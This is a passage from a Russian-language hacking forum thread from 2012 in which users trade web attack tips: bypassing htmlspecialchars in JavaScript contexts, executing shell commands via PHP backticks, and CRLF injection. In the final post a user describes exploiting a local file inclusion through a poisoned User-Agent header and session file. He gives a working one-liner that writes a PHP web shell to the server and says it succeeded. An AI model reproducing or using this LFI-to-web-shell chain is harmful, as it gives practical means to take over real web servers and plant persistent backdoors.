Старый 04.02.2012, 10:03   #1681
NetAng
 
Аватар для NetAng
 
Регистрация: 05.01.2011
Сообщений: 34
Репутация: 1
По умолчанию

Цитата:
htmlspecialchars() тоже не является 100% защитой в этом случае
а разве как то можно обойти htmlspecialchars()?
NetAng вне форума   Ответить с цитированием
Старый 04.02.2012, 13:34   #1682
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Цитата:
Сообщение от NetAng Посмотреть сообщение
а разве как то можно обойти htmlspecialchars()?
если инжект в яваскрипт или ивент, то обходить ничего не надо
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 04.02.2012, 23:10   #1683
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

ребята, подскажите, если на странице в хтмл в исходниках пристуствует код
PHP код:
<?php print bottom?>
это сильно страшно?каковы уязвимости
Shadowfolder вне форума   Ответить с цитированием
Старый 05.02.2012, 00:31   #1684
^mark
 
Регистрация: 29.01.2012
Сообщений: 7
Репутация: 0
По умолчанию

Подскажите пожалуйста, почему корректно выполняется такой код на php и показывает результат команды "id":
<?php $t=`id`;echo $t; ?>
^mark вне форума   Ответить с цитированием
Старый 05.02.2012, 00:36   #1685
Beched
 
Регистрация: 06.07.2010
Сообщений: 402
Репутация: 118
По умолчанию

Цитата:
Сообщение от Shadowfolder Посмотреть сообщение
ребята, подскажите, если на странице в хтмл в исходниках пристуствует код
PHP код:
<?php print bottom?>
это сильно страшно?каковы уязвимости
просто пхп код не выполняется

Цитата:
Сообщение от ^mark Посмотреть сообщение
Подскажите пожалуйста, почему корректно выполняется такой код на php и показывает результат команды "id":
<?php $t=`id`;echo $t; ?>
backticks (обратные кавычки) -- это выполнение системных команд
Beched вне форума   Ответить с цитированием
Старый 05.02.2012, 01:05   #1686
^mark
 
Регистрация: 29.01.2012
Сообщений: 7
Репутация: 0
По умолчанию

Цитата:
Цитата:
Сообщение от ^mark Посмотреть сообщение
Подскажите пожалуйста, почему корректно выполняется такой код на php и показывает результат команды "id":
<?php $t=`id`;echo $t; ?>
backticks (обратные кавычки) -- это выполнение системных команд
это получается хороший метод обхода фильтрации кавычек

было:
Цитата:
<?php system("id"); ?>
стало:
Цитата:
<?php $t=`id`;echo $t; ?>
^mark вне форума   Ответить с цитированием
Старый 05.02.2012, 07:47   #1687
M_script
 
Регистрация: 06.07.2010
Сообщений: 113
Репутация: 33
По умолчанию

^mark, можно еще короче:
PHP код:
<?=`id`
Цитата:
Сообщение от ^mark
а разве возможно, использовать так, если в php.ini "short_open_tag = Off"
Нельзя
M_script вне форума   Ответить с цитированием
Старый 05.02.2012, 07:51   #1688
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

CRLF injection/HTTP response splitting кто нибудь значет, что это?если да, напишите пару букв об этой уязвимости
Shadowfolder вне форума   Ответить с цитированием
Старый 05.02.2012, 09:02   #1689
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

Цитата:
Сообщение от ^mark Посмотреть сообщение
это получается хороший метод обхода фильтрации кавычек
Обход какой фильтрации у вас получается? Где?

Цитата:
Сообщение от Shadowfolder
CRLF injection/HTTP response splitting кто нибудь значет, что это?если да, напишите пару букв об этой уязвимости
Что именно не понятно?
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 05.02.2012, 09:37   #1690
^mark
 
Регистрация: 29.01.2012
Сообщений: 7
Репутация: 0
По умолчанию

Цитата:
^mark, можно еще короче:
PHP код:
<?=`id`
а разве возможно, использовать так, если в php.ini "short_open_tag = Off"

Цитата:
Цитата:
Сообщение от ^mark Посмотреть сообщение
это получается хороший метод обхода фильтрации кавычек
Обход какой фильтрации у вас получается? Где?
была найдена уязвимость класса LFI, при инклюде файлов они выполнялись как php-скрипт. В "user-agent" вписывал php-код, и инклюдил файл сессии. Когда в user-agent был код
Цитата:
<?php system("id"); ?>
то кавычки обрамлялись "\", и при инклюде появлялась ошибка.Пришлось для этого использовать backticks
когда я вписал
Цитата:
<?php $t=`id`;echo $t; ?>
я был очень удивлён, что сразу исполнилась системная команда, решил узнать поподробнее,
В итоге я составил такой скрипт для заливки шелла
Цитата:
<?php $t=`echo \<?php system\(\$\_GET\[0\]\)\; ?\> > /var/www/site/s.php`;echo $t; ?>
который успешно и выполнился
^mark вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot